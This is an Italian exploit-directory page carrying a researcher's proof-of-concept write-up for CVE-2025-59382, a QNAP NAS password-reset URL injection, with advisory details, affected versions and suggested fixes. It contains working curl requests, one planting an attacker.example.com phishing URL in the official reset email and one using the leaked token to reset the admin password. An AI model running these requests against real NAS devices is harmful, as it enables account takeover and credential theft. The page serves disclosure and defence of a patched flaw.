Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-59382-QNAP-Password-Reset-Account-Takeover — Proof-of-concept e resoconto tecnico per CVE-2025-59382, una vulnerabilità di iniezione di URL di reimpostazione della password non autenticata in QNAP NAS che consente una catena di phishing finalizzata all'acquisizione dell'account. | Kitploit
Strumenti/GitHubGitHub/rat5ak/cve-2025-59382-qnap-password-reset-account-takeover
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPhishingPenetration TestingApprendimento e Formazione
GitHubrat5ak/cve-2025-59382-qnap-password-reset-account-takeover

CVE-2025-59382-QNAP-Password-Reset-Account-Takeover

Proof-of-concept e resoconto tecnico per CVE-2025-59382, una vulnerabilità di iniezione di URL di reimpostazione della password non autenticata in QNAP NAS che consente una catena di phishing finalizzata all'acquisizione dell'account.

Vedi Repository
1112 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-59382: Reimpostazione Password QNAP per Acquisizione Account

URL di reimpostazione password controllato da un attaccante non autenticato in /cgi-bin/reset_password.cgi.

Testato su QuTScloud c5.2.4.3041 build 20250211 in un laboratorio. QNAP ha successivamente pubblicato questo come CVE-2025-59382 nell'avviso QSA-26-10.

Versione breve

Un attaccante non autenticato con accesso alla rete locale o a un'interfaccia di gestione NAS esposta può iniettare un URL arbitrario nell'email ufficiale di reimpostazione password QNAP manipolando il parametro url della funzione send_mail in /cgi-bin/reset_password.cgi.

La vittima riceve una vera email di reimpostazione password QNAP dal NAS. L'URL dell'attaccante è incorporato direttamente nel corpo HTML dell'email e QNAP aggiunge il token di reimpostazione () a quell'URL.

rp

Questo trasforma l'email di reimpostazione password in una bella catena di phishing-acquisizione account:

  1. L'attaccante attiva la reimpostazione password con il proprio URL
  2. Il NAS invia la vera email di reimpostazione QNAP alla vittima
  3. La vittima fa clic sull'URL dell'attaccante
  4. L'attaccante riceve il token di reimpostazione rp
  5. La vittima inserisce il codice di verifica (vc) nella pagina di phishing
  6. L'attaccante reimposta la password di amministratore e accede

Richiede l'interazione della vittima, ma nessuna autenticazione dell'attaccante.

Attivazione

root@kitploit:~
curl "http://<NAS_IP>:8080/cgi-bin/reset_password.cgi?func=send_mail&user=admin&url=https://attacker.example.com/phish"

Il NAS invia l'email ufficiale di reimpostazione e aggiunge il token di reimpostazione all'URL dell'attaccante, ad esempio:

root@kitploit:~
https://attacker.example.com/phish&u=admin&rp=e15a88a01fa81e58352b4b157607cb44

Il codice di verifica è mostrato anche nella stessa email. Nelle evidenze di laboratorio appariva così:

root@kitploit:~
Your verification code is: 2FEA2B8B

Quindi la pagina di phishing deve solo chiedere alla vittima il codice di verifica. Il token rp atterra già sul server dell'attaccante quando il link viene cliccato.

Reimpostazione password

Una volta che l'attaccante ha il token rp e il codice di verifica vc associato, può reimpostare la password di amministratore:

root@kitploit:~
curl -X POST -d "func=reset_user_pw&user=admin&token=e15a88a01fa81e58352b4b157607cb44&vc=725E0F00&new_pw=UHduZWQyMDI2IQ==" \
  "http://<NAS_IP>:8080/cgi-bin/reset_password.cgi"

La chiamata finale di reimpostazione deve essere una POST. Il codice di verifica che la vittima inserisce nella pagina falsa viene inviato a QNAP come vc=<code>.

La nuova password è codificata in base64 in new_pw. Nel PoC questo è bastato per cambiare la password di amministratore e poi accedere come admin.

Perché funziona

Il normale flusso frontend costruisce un URL locale del NAS come:

root@kitploit:~
location.protocol + "//" + location.host + "/cgi-bin/main.html?cp=1"

Ma il backend si fida del parametro url fornito dal client invece di generare l'URL di reimpostazione da sé. Quindi costruisce il link email utilizzando quel valore e aggiunge:

root@kitploit:~
&u=<user>&rp=<reset_token>

Si fida semplicemente di qualsiasi cosa venga passata come url.

Impatto

  • attivazione email di reimpostazione non autenticata
  • l'email ufficiale QNAP contiene URL controllato dall'attaccante
  • il token di reimpostazione viene perso verso l'attaccante quando la vittima fa clic
  • il codice di verifica può essere phishato dallo stesso flusso email
  • la catena di laboratorio ha dimostrato la reimpostazione della password di amministratore e l'accesso come admin

L'email di fiducia del NAS sta effettuando la consegna.

Stato pubblico

  • CVE: CVE-2025-59382
  • Advisory: QSA-26-10
  • Data di rilascio dell'avviso QNAP: 2026-06-17
  • CWE del venditore: CWE-472
  • CVSS v4.0 del venditore: 5.1 Medium
  • Stato QNAP: risolto

QNAP elenca i prodotti interessati come:

  • QTS 5.2.7
  • QuTS hero h5.2.8
  • QuTS cloud c5.2.8
  • QVP 2.7.1

Versioni corrette elencate da QNAP:

  • QTS 5.2.9.3499
  • QuTS hero h5.2.9
  • QuTS cloud c5.2.9
  • QVP 2.8.0

QNAP descrive il problema come un attaccante remoto che modifica l'URL di reimpostazione password e induce una vittima a visitare una pagina di reimpostazione controllata dall'attaccante, portando al furto di credenziali.

Il mio obiettivo di laboratorio è stato QuTScloud c5.2.4.3041 build 20250211. Il mio impatto di laboratorio è stato la reimpostazione della password di amministratore e l'accesso come admin dopo l'interazione della vittima.

Piccola nota: ho riprodotto questo nel mio laboratorio il 2026-05-09 e l'ho inviato a QNAP il 2026-05-11; lo hanno segnato come duplicato di INTSI000-9029. Poiché QNAP ha ora pubblicato il CVE/avviso, pubblico il POC. Crediti a Tim Coen come primo scopritore.

Cosa risolverei

Non conosco la patch esatta usata da QNAP. Il loro avviso elenca solo le versioni corrette.

La mia ipotesi per la giusta correzione è semplice: non lasciare che il browser dica al NAS dove dovrebbe puntare il link di reimpostazione.

Il NAS dovrebbe costruire quel link da sé. Se QNAP ha ancora bisogno di un parametro url per il flusso, dovrebbe accettare solo la normale pagina di reimpostazione del NAS e rifiutare qualsiasi cosa esterna.

Codificherei anche qualsiasi cosa venga inserita nel corpo dell'email e metterei un limite di velocità sulle richieste di email di reimpostazione non autenticate.

Riferimenti

  • Advisory QNAP: https://www.qnap.com/en/security-advisory/qsa-26-10
  • JSON CVE QNAP: https://www.qnap.com/uploads/security-advisories/QSA-26-10/CVE-2025-59382.json
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-59382
  • Record CVE: https://www.cve.org/CVERecord?id=CVE-2025-59382

Dichiarazione di non responsabilità: Questo codice exploit è pubblicato a scopo educativo e di ricerca difensiva. Non utilizzarlo contro sistemi di cui non possiedi o non hai esplicita autorizzazione per testare. L'autore non è responsabile per un uso improprio.

Daniel Wade - GitHub · Twitter/X · Bluesky · Mastodon · Medium · nadsec.online

Scarica lo strumento